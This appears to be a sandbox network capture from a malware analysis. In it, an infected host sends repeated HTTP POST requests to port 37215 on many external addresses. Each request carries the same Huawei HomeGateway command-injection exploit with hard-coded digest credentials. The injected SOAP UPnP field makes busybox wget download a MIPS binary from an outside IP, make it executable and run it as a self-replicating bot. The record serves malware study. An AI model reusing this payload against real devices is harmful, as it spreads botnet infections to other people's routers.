                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1161192.168.2.2341472157.24.249.15237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301162004 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1162192.168.2.2341210197.163.181.9937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301163912 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1163192.168.2.2355734197.29.23.21337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301192045 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1164192.168.2.234538476.22.218.6237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301202059 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1165192.168.2.234901841.145.90.22137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301211119 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1166192.168.2.235768441.229.138.17037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301234961 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1167192.168.2.2344660157.81.43.13537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301234961 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1168192.168.2.2341452197.3.228.15137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301249981 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1169192.168.2.2348712197.17.28.10437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301256895 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1170192.168.2.2344460197.248.33.10137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301270962 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
